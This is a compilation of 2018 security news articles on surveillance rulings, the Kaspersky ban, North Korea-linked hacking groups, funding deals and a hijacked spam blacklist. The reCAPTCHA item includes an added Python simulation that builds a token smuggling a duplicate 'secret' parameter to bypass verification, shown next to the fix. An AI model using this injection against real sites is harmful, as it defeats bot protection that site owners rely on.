“Thoma Bravo has long admired the work of Andy, Chris, Phil Villella and the entire LogRhythm team,” said Seth Boro, a managing partner at Thoma Bravo. “The company’s impressive track record of growth shows the continued demand for LogRhythm’s differentiated offerings. With Thoma Bravo’s investment, we look to further accelerate product innovation and drive continued customer success.”

Thoma Bravo has made several large investments in the cybersecurity space over the years. Its portfolio of investments include SonicWall, SailPoint, Hyland Software, Deltek, Blue Coat Systems, Imprivata, Bomgar, Barracuda Networks, Compuware and SolarWinds.


ProtonMail Launches VPN Application for macOS
1.6.2018 securityweek Apple

Encrypted email service provider ProtonMail on Wednesday announced the availability of a virtual private network (VPN) service for macOS users.

Initially introduced for some of its paid ProtonMail users in early 2017, the VPN service saw a wider launch on Windows last year, and also arrived on Android in January 2018. Last year, the CERN-founded company also launched a Tor hidden service and an encrypted contacts manager.

Following a beta testing period, the Swiss-based service provider is now making the VPN application available for all macOS users, allowing them to easily protect their Internet connections. Users who already have a ProtonVPN or ProtonMail account only need to download the application, log in, and start using it immediately.

Developed by the same team behind ProtonMail, the VPN service takes advantage of technologies such as Secure Core and Tor integration and is available for free with no ads. Furthermore, the company claims that users can enjoy it without worrying about malware or monetization of user data.

“With our VPN for Mac application, it is now extremely simple to switch countries, create custom profiles, connect to the Tor network, and route your traffic through our Secure Core servers. Not to mention all the essential perks of ProtonVPN, like hiding your IP address, defending against cyber-attacks, and unblocking censored content,” ProtonMail says.

Users opting for the free plan get unlimited bandwidth and access to servers in three continents. Upgrade options are available for those looking to gain access to more servers and extra features.

Many members of the ProtonMail community have requested the macOS app, the company says. Over the past months, the service provider has worked closely with over ten thousand beta testers to address bugs in the application and ensure it is not only easy to use, but also visually appealing.

The macOS app also takes advantage of the modern IKEv2 protocol for higher performance, providing users with a faster and more stable connection (it promises speeds of more than 300 Mbps, under the right conditions).

Users will be able to easily connect to any country with a single click, to choose from the available Secure Core servers, Tor servers, and P2P servers, and to create and save custom connection profiles. A VPN kill switch is also available, designed to cut the Internet if the connection to the VPN drops, thus preventing data from leaking when the VPN is not connected.

“More people are starting to wake up to the fact that privacy matters, and it is important to make tools like VPN widely accessible, especially for the over 1.5 billion people around the world who live under Internet surveillance and censorship,” Dr. Andy Yen, CEO of ProtonMail, said in a statement.


German Spy Agency Can Keep Tabs on Internet Hubs: Court
1.6.2018 securityweek  BigBrothers

Germany's spy agency can monitor major internet hubs if Berlin deems it necessary for strategic security interests, a federal court has ruled.

In a ruling late on Wednesday, the Federal Administrative Court threw out a challenge by the world's largest internet hub, the De-Cix exchange, against the tapping of its data flows by the BND foreign intelligence service.

The operator had argued the agency was breaking the law by capturing German domestic communications along with international data.

However, the court in the eastern city of Leipzig ruled that internet hubs "can be required by the federal interior ministry to assist with strategic communications surveillance by the BND".

De-Cix says its Frankfurt hub is the world's biggest internet exchange, bundling data flows from as far as China, Russia, the Middle East and Africa, and handling more than six terabits per second at peak traffic.

De-Cix Management GmbH, which is owned by eco Association, the European internet industry body, had filed suit against the interior ministry, which oversees the BND and its strategic signals intelligence.

It said the BND, a partner of the US National Security Agency (NSA), has placed so-called Y-piece prisms into its data-carrying fibre optic cables that give it an unfiltered and complete copy of the data flow.

The surveillance sifts through digital communications such as emails using certain search terms, which are then reviewed based on relevance.

De-Cix said in a statement Thursday that it believed the ruling shielded it from criminal liability for violations of the law protecting German domestic communications against tapping by stating that the German government bore responsibility.

However it said it would review whether it would take its complaint to the Federal Constitutional Court.

Given the mass of daily phone calls, emails, chats, internet searches, streamed videos and other online communications, an effective fire-walling of purely German communications is unrealistic, activists argue.

Germany had reacted with outrage when information leaked by former NSA contractor Edward Snowden revealed in 2013 that US agents were carrying out widespread tapping worldwide, including of Chancellor Angela Merkel's mobile phone.

Merkel, who grew up in communist East Germany where state spying on citizens was rampant, declared repeatedly that "spying among friends is not on" while acknowledging Germany's reliance on the US in security matters.

But to the great embarrassment of Germany, it later emerged that the BND helped the NSA spy on European allies.

Berlin in 2016 approved new measures, including greater oversight, to rein in the BND following the scandal.


Yes, Germany BND foreign intelligence service can spy on the world’s biggest internet exchange

1.6.2018 securityaffairs BigBrothers

This week, a federal court has ruled that Germany’s BND foreign intelligence service can monitor major internet hubs for strategic security interests.
Recently, the operator of the world’s top Internet Hub sued the BND foreign intelligence service for the surveillance activity conducted by the spy agency.

The operator wants to be sure that the agency is not violating any law by monitoring German domestic communications as well as tapping international traffic through the De-Cix exchange.

The De-Cix exchange, based in Frankfurt, is the world’s biggest internet exchange and therefore a privileged position for traffic monitoring.

The hub sees more than six terabits per second at peak traffic, with data flows from as far as China, Russia, the Middle East and Africa.

The Federal court of Leipzig ruled that internet hubs “can be required by the federal interior ministry to assist with strategic communications surveillance by the BND”.

The hub is operated by the De-Cix Management GmbH, which is owned by the European internet industry organization eco Association.

The eco Association filed suit against Germany’s interior ministry over the surveillance.

“We consider ourselves under obligation to our customers to work towards a situation in which strategic surveillance of their telecommunications only takes place in a legal manner.” states the body.

The mutual support between the US NSA and the BND has been extensively documented in the past.

In June 2015, Wikileaks released a collection of documents on the extended economic espionage activity conducted by the NSA in Germany. At the time, the cyberspies were particularly interested in the Greek debt crisis. US intelligence targeted German government representatives because of their privileged position in the negotiations between Greece and the EU.

In August 2015, the German weekly Die Zeit disclosed documents revealing how German intelligence struck a deal with the NSA to gain access to the XKeyscore surveillance platform.

Internal documents reported that Germany’s domestic intelligence agency, the Federal Office for the Protection of the Constitution (BfV), received the XKeyscore software from the NSA in return for data from Germany.

Back in 2011, the NSA demonstrated the capabilities of the XKeyscore platform to the BfV. After two years of negotiation, the BfV signed an agreement to receive the NSA software and install it to analyze metadata collected on German citizens. In return, the German agency promised to share the metadata it collected.

The NSA tool collects “nearly everything a user does on the internet”: XKeyscore provides the “widest-reaching” collection of online data, analyzing the content of emails, social media activity and browsing history.

In 2013, documents leaked by Edward Snowden explained that a tool named DNI Presenter allows the NSA to read the content of stored emails, and also enables intelligence analysts to track a user’s activities on Facebook through the XKeyscore system.

XKeyscore map used also by BND

According to Die Zeit, the document “Terms of Reference” stated: “The BfV will: To the maximum extent possible share all data relevant to NSA’s mission”.

In June 2016, the German government approved new measures to rein in the activities of the BND after the scandal over its support for NSA surveillance.


US Federal court judge rejected a lawsuit by Kaspersky against the ban on its products
1.6.2018 securityaffairs BigBrothers

US Federal court judge Colleen Kollar-Kotelly rejected a lawsuit by Russian cybersecurity firm Kaspersky Lab against the ban on the use of its products by government agencies.
On Wednesday, US Federal court judge Colleen Kollar-Kotelly rejected a lawsuit by Russian cybersecurity firm Kaspersky Lab against the ban on the use of its products by government agencies.

The ban on Kaspersky products, imposed by the US Department of Homeland Security, started in September 2017.

In December, Kaspersky Lab sued the U.S. Government over the product ban; the complaint was filed in the U.S. District Court for the District of Columbia, just a week after US President Donald Trump signed a bill that bans the use of Kaspersky Lab products and services in federal agencies.

Section 1634 of the bill prohibits the use of security software and services provided by the security giant; the ban takes effect on October 1, 2018.

Below the details of the ban included in the section 1634 of the National Defense Authorization Act for Fiscal Year 2018.

“SEC. 1634. Prohibition on use of products and services developed or provided by Kaspersky Lab.

(a) Prohibition.—No department, agency, organization, or other element of the Federal Government may use, whether directly or through work with or on behalf of another department, agency, organization, or element of the Federal Government, any hardware, software, or services developed or provided, in whole or in part, by—

(1) Kaspersky Lab (or any successor entity);
(2) any entity that controls, is controlled by, or is under common control with Kaspersky Lab; or
(3) any entity of which Kaspersky Lab has majority ownership.

(b) Effective date.—The prohibition in subsection (a) shall take effect on October 1, 2018.”

US officials believe Russian intelligence could use the Kaspersky software to spy on the systems running it.

Back to the present, Federal court judge Colleen Kollar-Kotelly rejected the lawsuit, reaffirming the right of the government to choose its providers to protect the security of its infrastructure.

The ban “does not inflict ‘punishment’ on Kaspersky Lab,” Kollar-Kotelly said in her ruling.

“It eliminates a perceived risk to the nation’s cybersecurity and, in so doing, has the secondary effect of foreclosing one small source of revenue for a large multinational corporation,” said Kollar-Kotelly.


The judge rejected Kaspersky’s complaint that US Government had illegally denied the firm’s “right” to sell a product, she also remarked that the ban is legal and will remain in place.

The impact on Kaspersky has been severe, and other governments have also expressed concern that its products could be abused as part of cyber espionage campaigns.

Many companies in the US already stopped using Kaspersky software, and most major stores have stopped selling it.

While the private company does not report its earnings, sales internationally have also reportedly been hurt.


North Korea-linked Andariel APT Group exploited an ActiveX Zero-Day in recent attacks
1.6.2018 securityaffairs APT

A North Korea-linked APT group, tracked as Andariel Group, leveraged an ActiveX zero-day vulnerability in targeted attacks against South Korean entities.
According to a report published by South Korean cyber-security firm AhnLab, the Andariel Group is a division of the dreaded Lazarus APT Group; it has already exploited ActiveX vulnerabilities in past attacks.

The attackers exploited at least nine separate ActiveX vulnerabilities, including a new zero-day flaw, in a wave of watering hole attacks aimed to infect visitors of compromised websites with a backdoor trojan.

The zero-day vulnerability seems to be connected to a series of attacks against Samsung SDS Acube installations.

Acube is an application developed by Samsung’s enterprise division that is widely used in South Korean enterprises and relies on ActiveX controls to implement interactive features.

“According to the security industry, from late last month until this month, attacks against North Korean research institutes and websites have been spotlighted.” reported the local media DDaily.

“The attacker, who is believed to be the Andariel Group, exploited about 9 ActiveX vulnerabilities, including Samsung SDS “eCube”, and tried to collect information through a watering hole attack.”


The malicious code was used to control the infected systems and gather intelligence.

“The zero-day vulnerability has been found in this attack, but it is unclear whether the attacker actually used it,” said a government official from the Korea Internet & Security Agency (KISA).

Simon Choi (@issuemakerslab) tweeted on May 29, 2018: “Operation GoldenAxe. North Korea's cyber attack only on South Korea (using ActiveX vuln) from 2007 to 2018.”
Samsung addressed the Acube zero-day flaw with the release of an update, while South Korea’s CERT team has issued a security advisory for the zero-day issue.

North Korea-linked APT groups are among the most active threat actors, recently the US-CERT issued an alert on two malware associated with North Korea-linked APT Hidden Cobra, the Brambul and Joanap.


Senators Ask National Security Advisor to Save Cybersecurity Coordinator Role
31.5.2018 securityweek BigBrothers

A group of Democrat senators is urging National Security Advisor John Bolton to reconsider the decision to eliminate the role of cybersecurity coordinator, arguing that it represents a step in the wrong direction.

Bolton announced the decision to cut the cybersecurity role following the departure of Rob Joyce. The National Security Council (NSC) said the move was part of an effort to streamline authority, noting that the duties of the cybersecurity coordinator would be taken over by two other senior directors.

“Streamlining management will improve efficiency, reduce bureaucracy and increase accountability,” the NSC said at the time.

Cybersecurity experts and several lawmakers contested the decision after it was announced. On Wednesday, Senator Amy Klobuchar and 18 other senators sent a letter to Bolton urging him to reconsider his recommendation, citing increasingly frequent and sophisticated cyber operations, particularly ones believed to have been launched by Russia.

“Our country’s cybersecurity should be a top priority; therefore, it is critically important that the U.S. government present a unified front in defending against cyberattacks,” the senators wrote. “Eliminating the Cybersecurity Coordinator role keeps us from presenting that unified front and does nothing to deter our enemies from attacking us again. Instead, it would represent a step in the wrong direction.”

While there are a few private-sector cybersecurity professionals who applaud the decision, many believe eliminating the role is a big mistake.

“The removal of the cybersecurity position will leave the Trump administration flat footed the next time a major cyber event does happen. In situations where minutes matter, the most prepared person in the room almost always carries the day. In a room full of decision makers with no cyber security background and a general who is in charge of fighting cyber wars, it is a foregone conclusion as to who will have the strongest voice in the room,” Ross Rustici, senior director of intelligence services at Cybereason, told SecurityWeek.

“Every cyber event will become a military issue with a military solution. Regardless of the efficacy of the position or those who occupied it, the fact that the position existed demonstrated a commitment to understanding, managing, and responding to cyber threats in a way that was on par with the other major global issues of the day. The absorption of that position into someone else’s duties makes cyber outside of the military context an ‘other duties as assigned’ mission. This will lead to a marginalization of the knowledge and strategy,” Rustici added.


HTTP Parameter Pollution Leads to reCAPTCHA Bypass
31.5.2018 securityweek Security

Earlier this year, a security researcher discovered that it was possible to bypass Google’s reCAPTCHA via HTTP parameter pollution.

The issue, application and cloud security expert Andres Riancho says, can be exploited when a web application crafts the request to /recaptcha/api/siteverify in an insecure way. Exploitation allows an attacker to bypass the protection every time.

When a web application using reCAPTCHA challenges the user, “Google provides an image set and uses JavaScript code to show them in the browser,” the researcher notes.

After solving the challenge, the user clicks verify, which triggers an HTTP request to the web application, which in turn verifies the user’s response with a request to Google’s reCAPTCHA API.

The application authenticates itself to the API with its secret key and sends along the reCAPTCHA-generated hash (the user's response token). If the user solved the challenge correctly, the API returns a success response, which the web application processes, most likely granting the user access to the requested resource.

Riancho discovered that an HTTP parameter pollution in the web application could be used to bypass reCAPTCHA (the requirement, however, reduced the severity of the vulnerability).

“HTTP parameter pollution is almost everywhere: client-side and server-side, and the associated risk depends greatly on the context. In some specific cases it could lead to huge data breach, but in most cases it is a low risk finding,” Riancho explains.

He notes that a single HTTP request to Google’s service could carry two parameters with the same name and still receive a valid response: the reCAPTCHA API would always use the first secret parameter on the request and ignore the second, which is the behaviour the researcher was able to exploit.

Additionally, Google provides web developers with a hard-coded, publicly documented site key and secret key for testing, which make reCAPTCHA verification accept any response in staging environments; the bypass leverages these test keys as well, since an attacker can inject the public test secret into the request.

“If the application was vulnerable to HTTP parameter pollution AND the URL was constructed by appending the response parameter before the secret then an attacker was able to bypass the reCAPTCHA verification,” the researcher notes.

Two requirements should be met for the vulnerability to be exploitable: the web application needs to have an HTTP parameter pollution flaw in the reCAPTCHA URL creation, and to create the URL with the response parameter first, and then the secret. Overall, only around 3% of reCAPTCHA implementations would be vulnerable.

Riancho points out that Google addressed the issue in the REST API by returning an error when the HTTP request to /recaptcha/api/siteverify contains two parameters with the same name.

“Fixing it this way they are protecting the applications which are vulnerable to the HTTP Parameter Pollution and the reCAPTCHA bypass, without requiring them to apply any patches,” the researcher notes.
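The bypass and Google's server-side fix, as an added simulation that is not Riancho's or Google's code: the keys, the solved token, the `duplicate-parameter` error code and the `fake_siteverify` stand-in for the real endpoint are all constructed for the example, so nothing here touches the network.

```python
"""Simulation of the reCAPTCHA siteverify HTTP parameter pollution bypass.

Added example. The keys, tokens and the siteverify stand-in are constructed;
they are not Google's real test keys or API behaviour byte-for-byte.
"""
from urllib.parse import parse_qsl, urlencode, urlsplit

VERIFY_URL = "https://www.google.com/recaptcha/api/siteverify"

# Constructed placeholders, not real keys or tokens.
APP_SECRET = "app-secret-0000"
# Stands in for Google's documented test secret key, which makes siteverify
# accept any response so developers can test in staging.
TEST_SECRET = "test-secret-ALWAYS-PASSES"
SOLVED_TOKENS = {"token-for-a-solved-challenge"}


def build_verify_url_vulnerable(user_response):
    """Unsafe: raw user input concatenated, and placed before the secret."""
    return "%s?response=%s&secret=%s" % (VERIFY_URL, user_response, APP_SECRET)


def build_verify_url_fixed(user_response):
    """Safe: urlencode escapes '&' and '=' in the token, and the secret comes first."""
    return VERIFY_URL + "?" + urlencode({"secret": APP_SECRET, "response": user_response})


def fake_siteverify(url, patched):
    """Constructed stand-in for Google's endpoint.

    patched=False models the pre-fix behaviour Riancho described: the first
    occurrence of a parameter wins. patched=True models the fix: a request
    carrying two parameters with the same name is rejected.
    """
    seen = {}
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if key in seen:
            if patched:
                # Error code is assumed; the page does not give Google's exact value.
                return {"success": False, "error-codes": ["duplicate-parameter"]}
            continue  # first occurrence wins, later duplicates are ignored
        seen[key] = value

    secret = seen.get("secret")
    if secret == TEST_SECRET:
        return {"success": True}  # test key: every response is accepted
    if secret != APP_SECRET:
        return {"success": False, "error-codes": ["invalid-input-secret"]}
    if seen.get("response") in SOLVED_TOKENS:
        return {"success": True}
    return {"success": False, "error-codes": ["invalid-input-response"]}


def attacker_response():
    """Token an attacker submits instead of solving the challenge.

    The embedded '&secret=' injects a second secret parameter; with
    response-before-secret URL building it lands ahead of the app's real secret.
    """
    return "bogus-token&secret=" + TEST_SECRET


def captcha_passed(build_url, user_response, patched):
    """What the web app does: build the URL, ask siteverify, read 'success'."""
    return fake_siteverify(build_url(user_response), patched)["success"]


if __name__ == "__main__":
    print("vulnerable app, old API :", captcha_passed(build_verify_url_vulnerable, attacker_response(), False))
    print("vulnerable app, fixed API:", captcha_passed(build_verify_url_vulnerable, attacker_response(), True))
    print("fixed app, old API       :", captcha_passed(build_verify_url_fixed, attacker_response(), False))
```

Two things to take from the simulation: under first-parameter-wins, merely putting `secret` before `response` would have blunted the injection, but the real application-side fix is encoding the user-supplied token so it cannot introduce new parameters at all; and Google's change (reject duplicate parameter names) protects applications that never patched their URL construction, which is why the fix was made in the API rather than left to each integrator.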

The issue was reported to Google on January 29, and a patch was released on March 25. The search giant paid the researcher $500 for the discovery.


U.S. Judge Rejects Kaspersky Suit Against Govt Ban on its Products
31.5.2018 securityweek BigBrothers

Washington - A Washington judge on Wednesday rejected a lawsuit by Russian computer security company Kaspersky Lab against the ban on use of its anti-virus software by government agencies.

Kaspersky had complained that the ban -- announced after officials said Russian intelligence was able to hack the software for espionage purposes -- was in effect a "punishment" of the company imposed without the government having given it any kind of hearing.

Federal court judge Colleen Kollar-Kotelly rejected the argument, saying the US government had the right to institute the ban to defend its computer security.


The ban "does not inflict 'punishment' on Kaspersky Lab," Kollar-Kotelly said in her ruling.

"It eliminates a perceived risk to the nation's cybersecurity and, in so doing, has the secondary effect of foreclosing one small source of revenue for a large multinational corporation," she said.

She also rejected the global cybersecurity giant's complaint that it had been illegally denied the "right" to sell a product that is legal, and that the ban harmed its reputation.

While the company can still market its products, she said, the government has no obligation to buy them.

In addition, she said, as the ban is legal and will remain in place, nothing can be done about any harm to its reputation.

The ban began with a directive in September 2017 from the Department of Homeland Security for government agencies to remove Kaspersky software from their computing systems.

That has since been followed by a provision set by Congress in a budget bill prohibiting agencies from using Kaspersky software.

Both came after the National Security Agency, the US signals intelligence body, determined that Kaspersky software on an NSA employee's private computer allowed hackers, believed to be from Russian intelligence, to steal top secret NSA materials.

US officials have also expressed concern about alleged ties between Kaspersky and the Russian government, which the company denies.

The impact on the company has been heavy. Most US companies have moved to stop using its software, and most major stores have stopped selling it.

While the private company does not report its earnings, sales internationally have also reportedly been hurt.


Operator of World's Top Internet Hub Sues German Spy Agency
31.5.2018 securityweek BigBrothers

Berlin - The operator of the world's largest internet hub challenged the legality of sweeping telecoms surveillance by Germany's spy agency, a German court heard Wednesday.

The BND foreign intelligence service has long tapped international data flows through the De-Cix exchange based in the German city of Frankfurt.

But the operator argues the agency is breaking the law by also capturing German domestic communications.

"We have grave doubts about the legality of the current practice," said a statement Wednesday on the website of De-Cix Management GmbH, which is owned by European internet industry body the eco association.

"We consider ourselves under obligation to our customers to work towards a situation in which strategic surveillance of their telecommunications only takes place in a legal manner."

Its lawyer Sven-Erik Heun told German news agency DPA that "the BND has chosen the biggest pond to go fishing in".

De-Cix Management launched its suit against the German interior ministry, which oversees the BND and its strategic signals intelligence.

"With the lawsuit, we seek judicial clarification and, in particular, legal certainty for our customers and our company," the company said.

The federal administrative court in the eastern city of Leipzig was not certain to make a ruling on Wednesday.

Given the mass of daily phone calls, emails, chats, internet searches, streamed videos and other online communications, an effective fire-walling of purely German communications is unrealistic, activists argue.

The De-Cix operator says its Frankfurt hub is the world's biggest Internet Exchange, bundling data flows from as far as China, Russia, the Middle East and Africa, and handles more than 6 terabits per second at peak traffic.

The De-Cix, with 20 data centres, uses more electricity than Frankfurt international airport, the Sueddeutsche Zeitung daily reported this week.

It said the BND, a partner of the US National Security Agency (NSA), has placed so-called Y-piece prisms into its data-carrying fibre optic cables that give it an unfiltered and complete copy of the data flow.


Tens of Vulnerabilities Found in Pentagon Travel Management System
31.5.2018 securityweek Vulnerebility

HackerOne announced on Wednesday the results of “Hack the DTS,” the fifth bug bounty program run by the U.S. Department of Defense (DOD).

The DTS (Defense Travel System) is a fully integrated and automated travel management system created specifically for the DOD. The platform is said to be accessed by roughly 100,000 unique users every day, including for creating authorizations, receiving approvals, preparing reservations, and generating travel vouchers.

The Pentagon wanted to test the security of the platform and selected 19 vetted hackers from HackerOne to complete the task. Researchers, mainly from the United States and the United Kingdom, submitted more than 100 vulnerability reports, 65 of which were classified as unique and valid, including 28 that described critical and high severity flaws.

White hat hackers earned a total of $78,650 for their findings, with the highest single payout, $5,000, paid out eight times.

“DTS is relied on by DoD travelers. More than 9,500 sites operate worldwide, and the security of these systems is mission-critical,” said Jack Messer, project lead at Defense Manpower Data Center (DMDC). “The ‘Hack the DTS’ challenge helped uncover vulnerabilities we wouldn’t have found otherwise, complementing the great work DMDC is already doing to protect critical enterprise systems and the people those systems serve.”

HackerOne pointed out that Hack the DTS was the second government bug bounty program that allowed participants to use social engineering.

The Pentagon has awarded researchers hundreds of thousands of dollars for finding thousands of vulnerabilities in its systems. The money was paid out through the Hack the Pentagon, Hack the Air Force, Hack the Army, and Hack the Air Force 2.0 bug bounty programs.


North Korea-Linked Group Stops Targeting U.S.
31.5.2018 securityweek BigBrothers

A threat actor linked to North Korea’s Lazarus Group has stopped targeting organizations in the United States, but remains active in Europe and East Asia.

The group, tracked by industrial cybersecurity firm Dragos as Covellite, has been known to target civilian electric energy organizations in an effort to collect intellectual property and information on industrial operations.

Unlike some of the other actors whose activities have been monitored by Dragos, Covellite does not currently have the capability to disrupt industrial control systems (ICS). However, the security firm does see it as a primary threat to the ICS industry.

Covellite’s campaigns have been aimed at organizations in Europe, East Asia and North America. One of the operations, conducted in September 2017, targeted U.S. electric companies and involved phishing emails and malicious Word documents designed to deliver a piece of malware.

FireEye analyzed those attacks and linked them to an actor affiliated with the North Korean government. The security firm published a report in October 2017 and noted that the actor appeared to lack the ability to disrupt power supply.

A blog post published by Dragos on Thursday does not mention North Korea, but researchers pointed out that Covellite’s infrastructure and malware are similar to ones associated with the group known as Lazarus and Hidden Cobra.

“Technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits. However, aside from technical overlap, it is not known how the capabilities and operations between COVELLITE and LAZARUS are related,” explained Sergio Caltagirone, director of threat intelligence at Dragos.

According to Dragos, Covellite has been around since 2017 and is still active, but it has recently stopped targeting organizations in North America, while continuing to attack entities in Europe and East Asia.

“Given the group’s specific interest in infrastructure operations, rapidly improving capabilities, and history of aggressive targeting, Dragos considers this group a primary threat to the ICS industry,” said Caltagirone.

While Covellite may no longer be targeting organizations in the United States, that does not mean all North Korea-linked groups have done the same. Several cybersecurity firms told CyberScoop this week that North Korea has still launched attacks on businesses in the U.S.

Dragos has published brief reports on several of the groups that pose a threat to ICS, including Iran-linked Chrysene, Russia-linked Allanite, and Xenotime, the group believed to be behind the Triton/Trisis attacks.


Fraud Protection Firm Signifyd Raises $100 Million
31.5.2018 securityweek  IT 

Signifyd, a San Jose, CA-based company that specializes in fraud protection solutions for e-commerce businesses, on Wednesday announced that it raised $100 million in a Series D funding round.

The round was led by Premji Invest, with participation from existing investors Bain Capital Ventures, Menlo Ventures, American Express Ventures, IA Ventures, Allegis Cyber and Resolute Ventures.

This brings the total raised by the company to date to $187 million, including $56 million secured in 2017 and $20 million in the previous year. Bloomberg reported that the company has been valued at roughly $400 million following the latest funding round.

Signifyd says it will use the funds to further accelerate its growth. The company claims the number of global e-commerce businesses it protects has doubled to more than 10,000. Signifyd customers include Build.com, Helly Hansen, iRobot, Walmart-owned Jet, Lacoste, Luxottica, Stance, Tous and Wayfair.

The company recently partnered with Magento, the open-source e-commerce platform, which Adobe agreed to buy for $1.68 billion.

Signifyd provides a solution that helps organizations identify fraudulent online orders by using a combination of machine learning, data science research and behavior technology. The solution should help reduce the risk of chargebacks and fraud without having a negative impact on customer experience.

Last month, the company opened its first European office in Barcelona, Spain.

“The fraud detection and prevention market is estimated to reach nearly $42 billion by 2022,” said Raj Ramanand, CEO and co-founder of Signifyd. “However, while fraud remains a serious concern, transactions wrongly declined due to suspected fraud represents a bigger problem of more than $150 billion a year. A wrong decline can push consumers to abandon the merchant and thereby erode customer lifetime value. With this funding, we’re looking to continue to enable friction-free e-commerce for enterprise and omnichannel retailers globally.”


The Current Limitations and Future Potential of AI in Cybersecurity
31.5.2018 securityweek  Cyber

A recent NIST study shows the current limitations and future potential of machine learning in cybersecurity.

Published Tuesday in the Proceedings of the National Academy of Sciences, the study focused on facial recognition and tested the accuracy of a group of 184 humans and the accuracy of four of the latest facial recognition algorithms. The humans comprised 87 trained professionals, 13 so-called 'super recognizers' (who simply have an exceptional natural ability), and a control group of 84 untrained individuals.

Reassuringly, the trained professionals performed significantly better than the untrained control group. Surprisingly, however, neither human experts nor machine algorithms alone provided the most accurate results. The best performance came from combining a single expert with the best algorithm.

"Our data show that the best results come from a single facial examiner working with a single top-performing algorithm," commented NIST electronic engineer P. Jonathon Phillips. "While combining two human examiners does improve accuracy, it's not as good as combining one examiner and the best algorithm."

"The NIST study used a form of deep learning known as convolutional neural networks that has been proven effective for image recognition because it performs comparative analysis based on pixels rather than the entire image. This is like looking at the individual trees rather than the forest, to use a colloquialism," explains Chris Morales, head of security analytics at Vectra.

The question the NIST researchers asked was how many humans or machines, combined, would produce the lowest error rate when comparing two photos to determine whether they are of the same person, with no errors being a perfect score. They found that pairing a human with a machine gives a single worker higher accuracy, and therefore higher productivity. This is because humans and algorithms have different strengths and weaknesses, which can be leveraged and mitigated by working together.

"What the researchers found," continued Morales, "was the best machine performed in the same range as the best humans. In addition, they found that combining a single facial examiner with machine learning yielded a perfect accuracy score of 1.0 (no errors). To achieve this same 1.0 accuracy level without machine learning required either four trained facial examiners or three super recognizers."

If these results are typical across the increasing use of artificial intelligence (AI) in cyber security -- and Morales believes the study is representative of the value of AI -- it implies we are rapidly approaching a tipping point. Right now, algorithms are not significantly better than trained professionals, but if used by a trained professional they can improve performance and reduce required manpower levels.

While AI itself is not new, it has grown dramatically in use and capability over just the last few years. "If we had done this study three years ago, the best computer algorithm's performance would have been comparable to an average untrained student," NIST's Phillips said. "Nowadays, state-of-the-art algorithms perform as well as a highly trained professional."

The implication is that we are not yet ready to rely solely on the decisions of machine learning algorithms, but that day is surely coming if algorithm quality continues to improve. We have, however, already reached the point where AI can decrease our reliance on human resources. The best results came not from a team of experts combined with machine learning, but from a single professional working with the best algorithm.

"It is often the case that the optimum solution to a new problem is found with the combination of human and machine," comments Tim Sadler, CEO and co-founder of machine learning email security firm Tessian. "However, as more labelled data becomes available, and more researchers look into the problem, machine learning models generally become more accurate and autonomous reducing the need for a human 'operator'. A good example of this is medical imaging diagnosis where deep learning models now greatly outperform radiologists in the early diagnosis of cancerous tissues and will soon become the AI 'silver bullet'."

He doesn't believe that facial recognition algorithms have reached that stage yet.

"Facial recognition technology is fairly new, and although machine learning is quickly disrupting the industry, clearly the technology is not perfect; for example, there have been instances where facial recognition technology has authenticated through family likeness," Sadler said. "It will take years of close partnership between facial recognition experts and their machine learning counterparts working together, with the experts overriding the machine's mistakes and correctly labelling the data, before a similar disruption is seen."

This NIST study is specifically about facial recognition -- but the basic principles are likely to be similar across all uses of machine learning in biometrics and cybersecurity. "First, the machine learning algorithm gathers facts about a situation through inputs and then compares this information to stored data and decides what the information signifies," explains Dr. Kevin Curran, senior IEEE member and professor of cybersecurity at Ulster University. "The computer runs through various possible actions and predicts which action will be most successful based on the collected information.

"AI is therefore increasingly playing a significant role in cybersecurity, especially as more challenges appear with authenticating users. However, these AI techniques must be adaptive and self-learning in complex and challenging scenarios where people have parts of their face obscured or the lighting is quite poor to preserve accuracy and a low false acceptance rate."

He cites the use of AI in Apple's Face ID. "Face ID works by projecting around 30,000 infrared dots on a face to produce a 3D mesh. This resultant facial recognition information is stored locally in a secure enclave on the new Apple A11 Bionic chip. The infra-red sensor on the front is crucial for sensing depth. Earlier facial recognition features, e.g. Samsung last year, were too easily fooled by face masks and 2D photos. Apple claim their Face ID will not succumb to these methods. However, some claim already that 3D printing someone's head may fool it, but we have yet to see that hack tested."

This NIST study was solely about the efficacy of facial recognition algorithms, and the results cannot be automatically applied to other machine learning algorithms. Nevertheless, the general conclusions are likely to apply across many other uses for AI in both physical security and cybersecurity. AI is improving rapidly. It cannot yet replace human expertise completely, but it is most effective when a single human expert works in conjunction with the best algorithm. The implication is very clear: the correct combination of man and machine already has the potential to both improve performance and reduce payroll costs.


Miscreants hijacked the defunct SpamCannibal blacklist service
30.5.2018 securityaffairs
Spam  

The SpamCannibal blacklist service has been hijacked since Wednesday morning: attackers changed the DNS name server settings for the website overnight.
SpamCannibal was created to blacklist the IP addresses of malicious servers involved in spam campaigns and DoS attacks.

SpamCannibal maintained a continually updated database of the IP addresses of spam and DoS servers and blocked their ability to connect by using a service that purposely delays incoming connections (a TCP/IP tarpit).

The blacklist service had been offline since last summer, but on Wednesday morning someone hijacked it, changing the DNS name server settings for the domain overnight.


The news was first reported by El Reg, which was informed of the strange resurrection by a reader who told them that SpamCannibal was “pumping out Blacklist notifications for some of our servers and then when you go to spamcannibal.org, you get spam.”

“Visiting the site earlier today flung fake Adobe Flash updates at our sandboxed browser, downloads no doubt riddled with malware, so beware.” reads a blog post published by El Reg.

The DNS records for the blacklist service were changed to point at a rogue server controlled by the attackers, who likely used it both to deliver malware and to alter the results of queries to the blacklist service.

Kevin Beaumont (@GossiTheDog), 12:51 PM - May 30, 2018: “If anybody uses spamcannibal's RBL, the domain has been taken over and has a wildcard response - so it returns everything as status spam.” https://twitter.com/webme_it/status/1001731230264627202

Every user who queried the service to check whether an IP address was blacklisted as a spam source always received a positive answer, with serious consequences for anyone still consuming the list, since every sender would be flagged as spam.

The attackers set up a wildcard DNS record so that any subdomain of spamcannibal.org resolves to an IP address. Because an RBL signals a listing by returning an A record for the queried name, this trick made every address looked up appear to be blacklisted.
Researcher Martijn Grooten believes the attack wasn’t targeted.

“This really looks like a standard domain takeover by some dodgy parking service. Doesn’t appear particularly targeted to Spamcannibal,” Grooten concluded.
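
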